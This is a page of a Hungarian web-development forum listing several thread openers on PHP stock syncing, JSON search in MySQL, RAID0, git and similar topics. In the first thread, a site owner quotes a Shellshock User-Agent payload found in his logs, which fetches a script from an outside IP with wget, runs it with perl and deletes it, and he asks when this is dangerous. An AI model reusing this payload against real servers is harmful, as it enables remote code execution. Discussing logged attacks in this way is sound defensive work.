Archívum - 139437 - Fórum téma
október 3
USER_AGENT exploit?
A weboldalamon a látogatói statisztikákat egy adatbázisban tárolom, ahol puszta kíváncsiságból bedobtam egy useragent oszlopot is, ami értelemszerűen a $_SERVER['USER_AGENT'] változó értékét kapja meg (szerencsére az admin panel sehol nem iratja ki ezt). Ahogy nézegettem az adatokat, ezt találtam köztük:Annyira rájöttem, hogy a kis hamis letöltene valami fájlt az adott IP-ről, aztán azt lefuttatná perl-el és eltakarítaná a nyomait.
Az egyértelmű, hogy nem jó szándékkal tenné, viszont az érdekelne, hogy mely esetekben fordulhat elő, hogy shell scriptben futtassak le USER_AGENT-et? Mikor jelent ez veszélyt?
■ () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/Az egyértelmű, hogy nem jó szándékkal tenné, viszont az érdekelne, hogy mely esetekben fordulhat elő, hogy shell scriptben futtassak le USER_AGENT-et? Mikor jelent ez veszélyt?
október 2
Parallax design
Sziasztok!
Épp egy parallax-os oldalon dolgozok, kérdésem az lenne milyen JS plugin-t ajánlotok parallax működéshez, aki csinált már ilyet tud-e valami használhatót?
Előre is köszönöm!
■ Épp egy parallax-os oldalon dolgozok, kérdésem az lenne milyen JS plugin-t ajánlotok parallax működéshez, aki csinált már ilyet tud-e valami használhatót?
Előre is köszönöm!
október 1
Egyik adatbázisból a másikba másolás bizonyos feltételek teljesülése esetén
Sziasztok!
Egy webáruházat fejlesztek és azt szeretném megoldani, hogy az offline bolt raktárkészletét folyamatosan kövesse a webáruház raktárkészlete. Kb. 3000 termékről van szó.
Tehát ha eladnak valamit az offline boltban, akkor a webáruházban is csökkenjen annak a terméknek a darabszáma.
Ezt egyelőre egy cron-al oldottam meg. Linkelem a PHP kódot, ami minden egyes percben lefutott.Nos, ezzel az egyszerű kóddal az a legnagyobb gond, hogy 3000 termék esetén csekély 4 óra alatt fut le.
Biztos vagyok benne, hogy van ennél sokkal jobb és elegánsabb megoldás.
Ha van ötletetek kérlek osszátok meg velem!
Köszönöm!
Peti
■ Egy webáruházat fejlesztek és azt szeretném megoldani, hogy az offline bolt raktárkészletét folyamatosan kövesse a webáruház raktárkészlete. Kb. 3000 termékről van szó.
Tehát ha eladnak valamit az offline boltban, akkor a webáruházban is csökkenjen annak a terméknek a darabszáma.
Ezt egyelőre egy cron-al oldottam meg. Linkelem a PHP kódot, ami minden egyes percben lefutott.
<?php
$db = new MySQLi(offline üzlet adatbázisa);
$db2 = new MySQLi(online üzlet adatbázisa);
if ($db->connect_errno) {
exit();
}
$lekerdez = "select cikkszam,cikkszam_nev,db,kisker_ar,nyilv_ar,kategoria,db from cikkszam order by 1";
$lekerdez2 = "select model,quantity from bio_product";
$talalat = $db->query($lekerdez);
$talalat2 = $db2->query($lekerdez2);
$n = $talalat->num_rows;
$s = $talalat2->num_rows;
for ($i=0; $i<$s; $i++) {
$sor2 = $talalat2->fetch_assoc();
$aktdb=0;
for ($j=0; $j<$n; $j++) {
$sor = $talalat->fetch_assoc();
if (stripslashes($sor['cikkszam']) == stripslashes($sor2['model']) && stripslashes($sor['db']) != stripslashes($sor2['quantity'])) {
$aktdb = $sor['db'];
mysqli_query($db2,"UPDATE bio_product SET quantity=".$aktdb." WHERE model='".stripslashes($sor2['model'])."'");
break;
}
}
$talalat = $db->query($lekerdez);
}
$db->close();
?>
Biztos vagyok benne, hogy van ennél sokkal jobb és elegánsabb megoldás.
Ha van ötletetek kérlek osszátok meg velem!
Köszönöm!
Peti
Felhasználó által beállítható automatizmusok
Sziasztok,
a következő problémába futottam bele:
adott egy adminisztrációs felület, ahol rendeléseket és termékeket lehet kezelni.
Jelenleg egy olyan funkció implementálásán dolgozom, amivel a rendszert használó felhasználó
egyedi automatizmusokat tud létrehozni, például ha egy termék státusza "készleten" helyett "nincs készleten"
lett, akkor a rendszer (azonnal, vagy pl. az esemény bekövetkezte után 3 nappal, tehát lehet késleltetni is) küldjön egy emailt az illetékes személynek,
vagy minden hétfőn reggel küldje ki a rendszer egy email címre a termékek listáját.
Az eseményhez/feltételhez kötődő műveletek elvégzése nem jelent gondot, viszont még nem találtam meg a megfelelő
módot, hogy hogyan vizsgáljam egy esemény (vagy időpont) bekövetkeztét, illetve hogyan kezeljem a késleltetéseket.
Van valakinek ötlete, hogy milyen formában lehetne tárolni a felhasználó által megadott feltételrendszert,
illetve hogyan lehetne azok bekövetkezését vizsgálni?
Előre is köszönök minden segítséget!
■ a következő problémába futottam bele:
adott egy adminisztrációs felület, ahol rendeléseket és termékeket lehet kezelni.
Jelenleg egy olyan funkció implementálásán dolgozom, amivel a rendszert használó felhasználó
egyedi automatizmusokat tud létrehozni, például ha egy termék státusza "készleten" helyett "nincs készleten"
lett, akkor a rendszer (azonnal, vagy pl. az esemény bekövetkezte után 3 nappal, tehát lehet késleltetni is) küldjön egy emailt az illetékes személynek,
vagy minden hétfőn reggel küldje ki a rendszer egy email címre a termékek listáját.
Az eseményhez/feltételhez kötődő műveletek elvégzése nem jelent gondot, viszont még nem találtam meg a megfelelő
módot, hogy hogyan vizsgáljam egy esemény (vagy időpont) bekövetkeztét, illetve hogyan kezeljem a késleltetéseket.
Van valakinek ötlete, hogy milyen formában lehetne tárolni a felhasználó által megadott feltételrendszert,
illetve hogyan lehetne azok bekövetkezését vizsgálni?
Előre is köszönök minden segítséget!
szeptember 27
JSFIDDLE - segítség
Üdv,
Adott egy számomra tetszetős naptár script!
De nem tudom lementeni, mert nem ismerem a jquery-t!
Ha esetleg valaki tudna segíteni abban, hogy milyen js/css fájlokat kell beilleszteni, hogy működjön, akkor nagyon örülnék!
Köszöszönet mindenkinek!
■ Adott egy számomra tetszetős naptár script!
De nem tudom lementeni, mert nem ismerem a jquery-t!
Ha esetleg valaki tudna segíteni abban, hogy milyen js/css fájlokat kell beilleszteni, hogy működjön, akkor nagyon örülnék!
Köszöszönet mindenkinek!
szeptember 24
git windows-on?
Használ itt valaki git klienst windows-on?
Fel akartam tenni, de a http://git-scm.com/download/win oldalról valami *preview*.exe kezd automatikusan letöltődni és az a "preview" a fájl nevében nagyon zavar.
Lehet, hogy nincs normális git még mindig windows-ra?
update: eredetileg a PyCharm nevű IDE-t használnám, aki keresi a git.exe-t. Ezért szerettem volna egy windows-os git-et.
■ Fel akartam tenni, de a http://git-scm.com/download/win oldalról valami *preview*.exe kezd automatikusan letöltődni és az a "preview" a fájl nevében nagyon zavar.
Lehet, hogy nincs normális git még mindig windows-ra?
update: eredetileg a PyCharm nevű IDE-t használnám, aki keresi a git.exe-t. Ezért szerettem volna egy windows-os git-et.
szeptember 22
Melyik kódot használjátok?
Melyik megközelítést használjátok a kettő közül, és miért?
1.)2.)(A forEach-et most felejtsük el egy pillanatra.)
■ 1.)
var a = [0,1,2];
for (var i=0, l=a.length; i<l; ++i) {
var v = a[i];
//...
}
var a = [0,1,2];
for (var i=0, l=a.length; i!=l; ++i) {
var v = a[i];
//...
}szeptember 19
Kérem véleményezéseteket
Sziasztok!
Ez úton szeretnék megkérni mindenkit (mint az egyik szerkesztője az oldalnak),
hogy legyek szívesek véleményezni az http://elsoceggondozo.hu oldalt (nem elsődlegesen kódolási szempontból), figyelembe véve, hogy jelenleg fejlesztés alatt áll. (Javasolt megjelenítés 1024x768 -nál nagyobb.) Szívesen vennénk az építő kritikáitokat, észrevételeiteket, véleményeiteket.
Köszönöm mindenkinek előre is a hozzászólását.
■ Ez úton szeretnék megkérni mindenkit (mint az egyik szerkesztője az oldalnak),
hogy legyek szívesek véleményezni az http://elsoceggondozo.hu oldalt (nem elsődlegesen kódolási szempontból), figyelembe véve, hogy jelenleg fejlesztés alatt áll. (Javasolt megjelenítés 1024x768 -nál nagyobb.) Szívesen vennénk az építő kritikáitokat, észrevételeiteket, véleményeiteket.
Köszönöm mindenkinek előre is a hozzászólását.
szeptember 16
MSQL like nem talál ékezetes json-t
Sziasztok!
A mysql egyik oszlopában JSON ben tárolok adatokat.
Az ékezetes karaktereket ugye kódolja, a "normált" nem.
Sajnos a keresés nem jól működik, mert az ékezetes karaktereket, amit ugye kódolt, azt nem találja. Amiben nincs ékezet, azt igen:
Tehát a Tesztem szónál:
Tárolva: ["Tesztem"]
keresés: where ( `labels` like '%"Tesztem"%' )
van találat, de a Tésztám:
Tárolva: ["T\u00e9szt\u00e1m"]
Keresés: where ( `labels` like '%"T\u00e9szt\u00e1m"%' )
nincs találat. Van ötlet mi lehet a gond?
előre is köszönöm a segítséget.
■ A mysql egyik oszlopában JSON ben tárolok adatokat.
Az ékezetes karaktereket ugye kódolja, a "normált" nem.
Sajnos a keresés nem jól működik, mert az ékezetes karaktereket, amit ugye kódolt, azt nem találja. Amiben nincs ékezet, azt igen:
Tehát a Tesztem szónál:
Tárolva: ["Tesztem"]
keresés: where ( `labels` like '%"Tesztem"%' )
van találat, de a Tésztám:
Tárolva: ["T\u00e9szt\u00e1m"]
Keresés: where ( `labels` like '%"T\u00e9szt\u00e1m"%' )
nincs találat. Van ötlet mi lehet a gond?
előre is köszönöm a segítséget.
RAID 0 (összefűzés dilemma)
Szervusztok!
Letargiába estem, egyszerűen nem tudok dűlőre jutni magammal, ebben kérem a segítségeteket.
Van egy vasam, van benne 2x1 TB merevlemez, innen üzemel a rendszerem, itt vannak az adatok.
Ha RAID0-val összefűzöm őket kétszerakkora lesz az írási és olvasási sebességem, mint eddig volt.
Az összefűzés hatására a két lemez egymástól fog függni, tehát ha az egyik kipurcan, az adatoknak búcsút inthetek.
Viszont ugyanez a veszély fennáll általános esetben is, maximum így az adatok egyik fele megmenthető lesz.
Szerintetek megérné összefűzni a lemezeket a kétszeres sebesség reményében, ezzel vállalva nagyobb kockázatot, vagy hagyjam általánosan, nem RAID-elve?
Köszönöm a válszokat, üdvözlettel: fabian.attila
■ Letargiába estem, egyszerűen nem tudok dűlőre jutni magammal, ebben kérem a segítségeteket.
Van egy vasam, van benne 2x1 TB merevlemez, innen üzemel a rendszerem, itt vannak az adatok.
Ha RAID0-val összefűzöm őket kétszerakkora lesz az írási és olvasási sebességem, mint eddig volt.
Az összefűzés hatására a két lemez egymástól fog függni, tehát ha az egyik kipurcan, az adatoknak búcsút inthetek.
Viszont ugyanez a veszély fennáll általános esetben is, maximum így az adatok egyik fele megmenthető lesz.
Szerintetek megérné összefűzni a lemezeket a kétszeres sebesség reményében, ezzel vállalva nagyobb kockázatot, vagy hagyjam általánosan, nem RAID-elve?
Köszönöm a válszokat, üdvözlettel: fabian.attila



